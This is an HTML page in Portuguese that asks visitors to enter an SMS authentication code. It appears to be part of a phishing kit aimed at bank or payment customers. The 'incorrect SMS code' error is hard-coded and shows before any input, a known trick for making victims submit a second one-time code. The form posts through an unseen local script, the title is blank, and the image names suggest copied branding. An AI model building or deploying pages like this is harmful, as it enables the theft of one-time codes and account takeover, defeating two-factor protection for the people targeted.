<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/mikasa.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body >
    <div class="top1">
        <img src="./img/topo.JPG" alt="">
    </div>

    <div class="kolch1">
        <p class="p-1">Verificação de SMS</p>
        <p class="p-2">Código de Autenticação.</p>

        <form action="" method="post" id="pg4">
            <p class="p-3">
                Foi enviado um SMS para o seu número com o código de autenticação. Aguarde o SMS e após a sua receção por favor introduza o código em baixo.
            </p>

            <p>Código SMS </p>
                <input type="tel" name="" id="sps2" required maxlength="15">

                <p style="color: rgb(196, 36, 36); margin-top: -5px;">código SMS incorrecto</p>
               

            <button type="submit" >Confirme</button>
        </form>
        
        
    </div>


    <div>
        <div class="bonit">
            <img src="./img/boit1.JPG" alt="">
            <img src="./img/boit2.JPG" alt="">
        </div>
    </div>
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>